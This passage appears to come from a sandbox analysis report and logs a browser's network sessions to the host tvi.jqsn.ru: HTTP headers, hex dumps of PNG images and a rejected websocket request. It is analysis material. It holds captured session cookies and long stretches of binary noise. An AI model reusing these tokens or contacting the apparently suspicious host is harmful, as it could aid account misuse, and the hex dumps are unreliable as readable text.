                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:56 UTC744INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:56 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="qr6ucATmqV0pZCT5vGBmnHQQ5qeSshM667135"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BDk1dANDNZoSk3G%2FkGiTdPWZvMc0EQ9R%2B19IrRjsHxSOuihvN5WXU6is81z8F6osX7fM%2BFIpfj6BwzxUM%2Bv4rSpaFcoE8LPh%2F0VjK8pg4hlEhp%2BAytLm%2BkqV8wCVpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 87585500c93c53e6-ATL
                                                                                                                          2024-04-17 00:34:56 UTC625INData Raw: 32 64 37 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b
                                                                                                                          Data Ascii: 2d7PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk
                                                                                                                          2024-04-17 00:34:56 UTC109INData Raw: 38 84 89 7f 0e a0 1b f9 d4 30 d7 05 11 3f a2 d6 31 b9 77 00 22 26 92 b5 83 ee ce 00 38 6a c2 35 76 4f 00 3c 9d a8 4f 67 53 4d a4 6a 25 9c b9 75 06 bc 45 3d 3a 00 9b 58 4a 3d 3d f7 86 81 d1 02 28 ad a1 9d 33 30 01 28 8d c0 ae f7 4f 29 34 31 50 18 81 d1 a7 d0 1f 70 6b 51 40 66 f8 53 a2 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                          Data Ascii: 80?1w"&8j5vO<OgSMj%uE=:XJ==(30(O)41PpkQ@fSIENDB`
                                                                                                                          2024-04-17 00:34:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          56192.168.2.449804104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:54 UTC1485OUTGET /qrroFnG3M60J3FhNqOM0FGt8JF3y5912lJkLOor1EsoLL8YoDCMTx8tUgChmhe8gngUwuef236 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:56 UTC769INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:55 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="qrroFnG3M60J3FhNqOM0FGt8JF3y5912lJkLOor1EsoLL8YoDCMTx8tUgChmhe8gngUwuef236"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lsUMuuVEcNJT6X7oaIxiCgkpX9fe0h3UAqYeTK2PVOCa0lCF%2BQmJXu8mG4H2KJX3fv7KIZJH23gZuUbUzSdSqH7Iuac6fBry%2FztjrgZyGB6eM3AK8kxEc9ZZOtgkNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875855009ab144d0-ATL
                                                                                                                          2024-04-17 00:34:56 UTC600INData Raw: 33 32 66 65 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57
                                                                                                                          Data Ascii: 32fePNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RW
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 56 d5 77 0d e9 2c d5 aa 54 99 f2 08 ee de 17 a6 a6 b9 d5 d6 f4 e5 f3 a7 58 bf 7c 11 be 7c f9 4c 65 74 ef d1 03 a3 46 8e 64 be 57 1b 51 d6 90 21 c0 10 60 08 18 0e 02 6c b0 e7 c1 57 67 ce 9e e3 7e 9f 36 15 2f 5e bc e0 41 da 77 11 ae 6e 45 d1 7d c0 ff 60 66 66 a6 b1 dc 53 a1 07 70 e2 f0 3e a9 9c 21 43 87 22 29 29 09 4f 9f 3e 45 fc 87 0f 39 ca cf 97 2f 3f 8a 16 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12
                                                                                                                          Data Ascii: Vw,TX||LetFdWQ!`lWg~6/^AwnE}`ffSp>!C"))O>E9/?+bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 39 7d 9a ca ec d2 77 30 3c 4b 95 91 6a b6 7d e3 2a dc 0a bb 22 fd 9b 2c d4 23 24 5f d0 c1 51 0d ed f5 db 84 90 3d 49 e0 f3 ed db 37 aa 88 b5 b5 35 5d 29 ac ee 6e 05 59 6b 64 17 e1 0d 1c 38 10 e4 c5 0a 43 c0 98 10 e8 d9 b3 27 ae 5c 91 8c 15 4b 97 2d 87 7f 2d 3f 8d c6 25 63 c2 4e cc b6 b2 20 50 c3 bb 33 67 ce e2 d6 ad 93 9c 2c 17 dc a1 23 26 4e f8 4d 63 1c 97 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88
                                                                                                                          Data Ascii: 9}w0<Kj}*",#$_Q=I75])nYkd8C'\K--?%cN P3g,#&NMc.[-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 8c c5 bd cc 4e 0d 11 60 44 af 21 80 ac 39 d4 1a 50 8d 09 b7 df a7 4f e7 36 6e d8 40 4d ee d2 b5 1b c6 8e 19 cd 0b 66 59 cd e6 3f 26 c4 e3 f0 9e 6d b8 7d e3 1a 7e 1e 37 d5 28 9e d5 47 84 5f c3 d9 13 a1 78 9d 9e 06 b7 51 e3 c6 f8 63 ee 5c b5 30 e6 93 e8 ed 2d 2c 30 a9 72 25 34 73 97 fc f8 22 65 f7 d3 a7 98 7d e3 26 a2 92 92 e8 df e5 0b 14 c0 af be 15 51 cd b1 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c
                                                                                                                          Data Ascii: N`D!9PO6n@MfY?&m}~7(G_xQc\0-,0r%4s"e}&Q1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: e6 b6 6f d6 b6 13 ec f2 e5 97 42 99 92 92 8c 13 87 f6 e1 fc a9 a3 74 cb 5d db 10 49 66 3e a1 96 47 f7 ef d2 59 fc 93 48 f9 95 e4 3d da 97 a5 b7 ea f3 db 59 e4 a8 fa 37 33 37 98 39 74 d4 18 63 46 f4 42 8d 10 a6 97 26 08 30 a2 d7 04 3d d6 96 72 19 83 41 1e 81 7f 57 ae e2 e6 fd 31 97 7e d8 30 28 08 f3 e7 cd e3 05 a3 9b b7 23 b8 4e e9 ab f8 89 6c 5b bb 7c 68 d2 ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd
                                                                                                                          Data Ascii: oBt]If>GYH=Y7379tcFB&0=rAW1~0(#Nl[|hJS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334R
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 7e 63 7f 9f 07 92 4d ee d0 ee ad 20 ab d9 ab d4 ac 83 fa 8d 5b d0 74 b7 19 25 29 31 91 e6 c0 bf 19 76 19 f6 0e 8e 34 07 7e 91 a2 c5 79 87 3c f9 eb 17 e9 6d fa 8c 1f 22 a4 93 4a e5 1d e9 73 78 ff 6a ca ef e5 af d0 60 0d d5 cf dc cc 14 57 0f 74 51 49 d7 54 0b 5f e4 29 10 a8 11 ee 8c e8 55 82 9c b7 ca 4e 56 96 b0 33 37 47 5e 33 73 e4 ce 65 02 8e 03 d2 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4
                                                                                                                          Data Ascii: ~cM [t%)1v4~y<m"Jsxj`WtQIT_)UNV37G^3se8ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#Vo
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: e9 2d fe 8c 3a e1 d7 2e d1 e7 f9 e4 56 7f cd 3a 81 99 52 e8 92 7a f7 6e 87 e3 c2 e9 63 78 f6 58 b2 f8 4f b6 1c df 12 0c fb fc fc ec c3 7f ff e1 0b ba 0c 3b 80 17 af 3e d2 2e c8 11 b5 7d 3a c9 af 2d 50 c6 27 5f f2 0d 80 b5 55 5e 8d f1 67 44 af 0c da 99 eb 84 94 f0 44 ef d2 a5 51 dc 56 18 27 24 66 68 78 f7 fd 07 fc 7b ef 1e b6 3d fe fe b8 49 3d 0b 0d bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da
                                                                                                                          Data Ascii: -:.V:RzncxXO;>.}:-P'_U^gDDQV'$fhx{=I=#zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 8d eb 15 43 93 80 62 b0 b2 d4 3c 53 5a aa 65 4d e4 c9 5f 8b 77 ec 19 d1 e7 1c 06 b3 aa 57 45 07 0f f9 ac 8a 5a 0b 1c 2d 0b fe f7 de 7d 4c bd 16 a6 e5 5e 84 21 9e 11 bd 30 fc 60 c8 5a f0 3e d8 0a 19 8c 7e fd fa 73 e7 ce 49 b6 9e 8d 19 3b 0e 5d bb 84 e8 dc fe a7 cf 5f 70 5d 43 42 10 97 7e db dd cc cc 0c 26 b9 72 a1 6e 83 a6 a8 5e 3b 00 b9 72 c9 6f 4f 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9
                                                                                                                          Data Ascii: Cb<SZeM_wWEZ-}L^!0`Z>~sI;]_p]CB~&rn^;roO#[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Z
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: c0 f4 eb 2d 98 70 ca af 90 56 cd 3f b9 90 96 a7 3c 52 2d 7c 60 65 ed a8 57 6c 19 d1 7f f7 9c 9d b9 39 0e 37 6d 0c 27 2b 2b d5 dc a9 a0 76 6a 5a 1a 76 85 9e 53 4b 66 f9 52 c5 51 aa 98 ab 5a 6d 15 35 ba f7 e1 03 1a ed 3f a8 a8 9a 41 7e cf 88 de 20 dd 26 28 a5 f5 3a 30 6b 1b 89 09 13 27 72 db b7 6d a3 dd f4 ec d5 1b bf 8c 18 2e 6a 7b b3 c3 33 e9 f3 67 ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9
                                                                                                                          Data Ascii: -pV?<R-|`eWl97m'++vjZvSKfRQZm5?A~ &(:0k'rm.j{3g4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 5f 32 9f ce 56 b1 a2 2f 66 cc 9a 85 22 85 5d 0c c6 4e c3 09 1d e1 69 ca 88 fe bb 4f cc 72 e5 c2 9e 46 41 f0 ca 9f 4f 65 47 a9 92 0c 47 65 e1 d9 34 b0 2f 60 47 c9 5e dd 72 f9 cd 5b 04 87 2a 9e 00 a8 2b 5f 9f ed 18 d1 eb 13 7d 71 f4 6d 10 04 78 23 fc 26 d7 a7 77 2f 7c fe fc 59 8a 7a e5 1a fe a8 e0 5b 15 6e c5 24 7b 74 93 93 bf e2 f1 83 7b 08 bb 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9
                                                                                                                          Data Ascii: _2V/f"]NiOrFAOeGGe4/`G^r[*+_}qmx#&w/|Yz[n${t{|FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          57192.168.2.449806104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:54 UTC1275OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: Upgrade
                                                                                                                          Pragma: no-cache
                                                                                                                          Cache-Control: no-cache
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Upgrade: websocket
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          Sec-WebSocket-Key: 0S5ndanifdktQoWEQimR6g==
                                                                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                          2024-04-17 00:34:55 UTC575INHTTP/1.1 400 Bad Request
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:55 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QxLdFrIhYFtAfIbLYK521xWQ6SEGUqrVtkyXiKs7eCwk2C5bNxsIb1llF7m%2FKtBeQ%2FVeSIuOyDOtuPTVc51YMObUTDRUsaLNu1g%2FuLvgt3T2CZ9OVS8iID%2Fpl6AOLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875855024ae1ad71-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:55 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                                                          Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                                                          2024-04-17 00:34:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          58192.168.2.449808172.67.130.2124433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:54 UTC1117OUTGET /mnVEZMoPpz26As0HD4QkJNjKc65AwrKklFl1gYZXk0KqRGGuqdpbpq90150 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
